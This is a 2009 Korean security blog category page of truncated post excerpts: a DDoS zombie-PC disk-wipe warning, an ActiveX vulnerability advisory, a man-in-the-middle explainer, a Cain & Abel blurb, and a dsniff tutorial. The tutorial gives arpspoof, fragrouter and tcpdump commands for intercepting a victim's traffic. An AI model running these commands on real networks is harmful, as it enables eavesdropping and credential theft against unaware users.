본문 바로가기

해킹190

728x90
긴급! DDoS 관련 좀비PC 하드디스크 손상 주의 7월 10일 0시를 기하여 특정 악성코드에 감염된 PC가 포멧될 가능성이 있습니다. PC를 종료하시고 안전모드(F8)로 부팅하시고, 시간을 7월 10일 이전으로 변경하시기 바랍니다. □ 개 요 o 지난 7일부터 시작된 DDoS 공격의 좀비 PC들이 7월 10일 00시를 기점으로 스스로 하드디스크를 손상시켜 PC가 부팅이 되지않아 동작 불능상태가 될 수 있음 o 사용자들은 PC 하드디스크 손상을 방지하기 위해서는 해결방안을 반드시 수행하기를 권고함 □ 설 명 o 지난 7일부터 대대적으로 DDoS 공격을 실행하였던 좀비 PC들이 악성코드의 흔적을 감추기 위해 스스로 하드디스크를 손상시켜 PC가 동작 불능 사태가 되도록 함 o 안전모드로 부팅후 아래와 같은 요소가 만족될 경우 하드디스크가 손상되었거나, 손상을.. 2009. 7. 9.
MS 윈도우의 비디오처리 ActiveX 신규 취약점 유의 ■ 개 요 Micrososft Video ActiveX 컨트롤(msvidctl.dll)에서 원격코드 실행이 가능한 신규(7.7 기준 보안패치 미발표) 취약점이 발표됨에 따라 각급기관 담당자들은 해당 취약점을 악용한 해킹에 대비, 아래의 '임시 대응책'을 조속히 수행할 것을 권고합니다. ■ 해당 시스템 o 영향받는 소프트웨어 - Windows XP SP 2 and Windows XP SP 3 - Windows XP Professional x64 Edition SP 2 - Windows Server 2003 x64 Edition SP 2 - Windows Server 2003 with SP2 for Itanium-based Systems o 영향받지 않는 소프트웨어 - Microsoft Windows 200.. 2009. 7. 8.
중간자 공격(Man-in-the-Middle Attack) - (동영상) 중간자 공격(Man-in-the-Middle Attack) 동의어: 웹 사이트 스프핑(Web Site Spoofing), 가짜 웹 사이트(Spoofed or Faked Web sites), 파밍(Pharming) 설명: “중간자 공격(Man-in-the-Middle Attack)" 이라는 말은 사이버 범죄자가 가짜 웹 사이트를 통해 소비자와 합법적인 조직 간의 통신을 빼내는 컴퓨터 공격을 설명하는데 사용됩니다. 이러한 공격에서 소비자, 조직 모두 그들의 통신이 불법적으로 모니터 되고 있다는 사실을 인식하지 못합니다. 범죄자는 사실상 소비자와 소비자의 은행, 신용회사 또는 소매업체 간의 거래 중간에 있는 것입니다. 중간자 공격 서버는 전자적으로 모든 키스트로크를 “엿들어서” 범죄자에서 사용자이름, 비밀번호.. 2009. 6. 3.
dsniff 이용한 패킷 스니핑 (Packet Sniff) 동일 네트웍 상에 있는 컴퓨터 들은, gateway 의 mac주소를 arp spoofing 하는 방법으로 밖으로 나가는 패킷들을 sniffing 할 수 있다. dsniff 란 툴을 이용하면 이것들을 쉽게 할 수 있다. 콘솔을 3개 띄워서 각각의 명령어를 친다. 1. gateway 의 주소를 속인다 $ sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 2. 들어오는 패킷을 외부로 라우팅 해준다. (이렇게 해야 실제 컴퓨터를 사용하는 사람은 기존과 똑같이 인터넷을 이용할 수 있다.) $ sudo fragrouter -i wlan0 -B1 3. 원하는 packet 을 캡춰한다. $ sudo tcpdump tcp dst port 80 -i wlan0 -s1500 -w- 만.. 2009. 6. 3.
Cain & Abel 4.9.31 - New Version Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing.. 2009. 6. 3.
728x90
728x90